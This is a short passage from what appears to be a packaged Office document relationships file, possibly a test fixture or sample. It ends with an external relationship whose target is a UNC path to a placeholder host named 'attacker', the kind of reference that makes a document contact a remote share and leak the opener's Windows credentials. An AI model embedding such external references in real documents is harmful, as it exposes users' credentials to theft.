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\\attacker:LOW:\share\x.png" TargetMode="External"/></Relationships>
</file>